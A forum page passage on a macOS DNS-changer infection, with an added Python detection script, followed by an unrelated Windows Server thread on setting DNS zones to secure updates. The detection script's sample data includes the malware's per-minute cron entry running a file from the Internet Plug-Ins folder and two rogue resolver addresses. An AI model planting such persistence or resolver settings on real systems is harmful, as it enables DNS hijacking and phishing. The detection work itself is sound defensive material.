    Of course, it is only spurious, since a look at my routing table has never shown it pointing to these two servers. Might be the cause of some intermittent problems, but haven't seen any problems.
    Time to change passwords just in case.
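The decoded script above does two things that are easy to check for: it rewrites the resolver list of the primary network service through scutil, and it re-installs a per-minute cron job pointing into /Library/Internet Plug-Ins. As an added example (not posted by anyone in the thread), this Python script scans the resolvers macOS is actually using, as printed by `scutil --dns`, against an allowlist, and flags crontab entries that execute anything out of the plug-ins folder or run every minute. The sample `scutil --dns` output and crontab are constructed in the shape the thread describes, reusing the two addresses it quotes; the allowlist and the exact text layout of `scutil --dns` are assumptions.

```python
"""Added example: detect a DNS-changer of the kind described above (rogue
resolvers applied via scutil, re-armed by a cron job)."""
import ipaddress
import re
import subprocess
from typing import Dict, Iterable, List

NAMESERVER_RE = re.compile(r"^\s*nameserver\[\d+\]\s*:\s*(\S+)")
PLUGIN_DIR_RE = re.compile(r"/Library/Internet Plug-Ins/")


def parse_scutil_dns(text: str) -> List[str]:
    """Return the nameserver addresses listed in `scutil --dns` output, in order, deduplicated."""
    found: List[str] = []
    for line in text.splitlines():
        m = NAMESERVER_RE.match(line)
        if m and m.group(1) not in found:
            found.append(m.group(1))
    return found


def unexpected_resolvers(resolvers: Iterable[str], allowed: Iterable[str]) -> List[str]:
    """Resolvers not inside any allowed network (entries may be CIDR or single addresses)."""
    nets = [ipaddress.ip_network(a, strict=False) for a in allowed]
    bad = []
    for r in resolvers:
        try:
            ip = ipaddress.ip_address(r.split("%")[0])   # drop an IPv6 scope id such as %en0
        except ValueError:
            bad.append(r)                                 # not even an address: report it
            continue
        if not any(ip in n for n in nets):
            bad.append(r)
    return bad


def suspicious_cron_lines(crontab_text: str) -> List[str]:
    """Cron entries that run something from the Internet Plug-Ins folder (a plug-in
    bundle directory has no business being a cron target) or that fire every minute."""
    hits = []
    for line in crontab_text.splitlines():
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        fields = s.split(None, 5)
        every_minute = fields[:5] == ["*", "*", "*", "*", "*"]
        if PLUGIN_DIR_RE.search(s) or every_minute:
            hits.append(s)
    return hits


def scan(scutil_text: str, crontab_text: str, allowed: Iterable[str]) -> Dict[str, List[str]]:
    resolvers = parse_scutil_dns(scutil_text)
    return {
        "resolvers": resolvers,
        "unexpected_resolvers": unexpected_resolvers(resolvers, allowed),
        "suspicious_cron": suspicious_cron_lines(crontab_text),
    }


def scan_live(allowed: Iterable[str]) -> Dict[str, List[str]]:
    """On a real Mac: read `scutil --dns` and the current user's crontab (run as each
    user that might own a crontab, including root)."""
    scutil_out = subprocess.run(["scutil", "--dns"], capture_output=True, text=True).stdout
    cron = subprocess.run(["crontab", "-l"], capture_output=True, text=True).stdout
    return scan(scutil_out, cron, allowed)


# Constructed sample inputs in the shape the thread describes.
SAMPLE_SCUTIL = """\
DNS configuration

resolver #1
  nameserver[0] : 85.225.113.141
  nameserver[1] : 85.225.112.232
  if_index : 4 (en0)
  flags    : Request A records
"""
SAMPLE_CRONTAB = '* * * * * "/Library/Internet Plug-Ins/QuickTime.xpt">/dev/null 2>&1\n'
EXPECTED_RESOLVERS = ["192.168.2.1", "10.0.0.0/8"]   # assumed: the LAN router and an internal range

if __name__ == "__main__":
    print(scan(SAMPLE_SCUTIL, SAMPLE_CRONTAB, EXPECTED_RESOLVERS))
```

The resolver check is the one that matters for the "heavily phished targets" risk: a machine can look clean in System Preferences while `scutil --dns` shows the injected servers, because the script writes the State: key directly rather than the Setup: key the GUI edits. The cron check catches the re-arming mechanism, which is why deleting the file alone was not enough for the poster.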

  • Windows Server 2008 DNS command syntax to set All zones to Dynamic Secure updates

    Hello,
    I am trying to configure all of my 150 DNS zones for dynamic updates from "none" to "secure".
    What is the command I should run to update all my zones. I ran "dnscmd myservername /config ALLZones /AlowUpdate 1"  and I keep on receiving this error message
     "DNS_ERROR_ZONE_DOES_NOT_EXIST"
    What should be the exact command/argument I should run to propagate this on all my zones ?
    is "..allzones" or "allzones"  a valid argument ?
    Thanks
    Robert

    Hi Robert,
    Even add the two dots, I also get the same result.
    Here is the screenshot of my lab,
    As Kumar has mentioned, you need to write a script.
    I have tried to modify the script provided by Kumar. It works on my lab server.
    Here is the script,
    # Get-DnsServerZone / Set-DnsServerPrimaryZone come from the DnsServer PowerShell module
    # (Windows Server 2012 and later); secure dynamic update is only possible for AD-integrated zones.
    $a = Get-DnsServerZone
    foreach ($zone in $a) {
        if ($zone.ZoneType -eq "Primary") {
            if ($zone.IsDsIntegrated -eq $true) {
                Set-DnsServerPrimaryZone -DynamicUpdate Secure -ZoneName $zone.ZoneName
            }
        }
    }
    Best Regards.
    Steven Lee
    TechNet Community Support
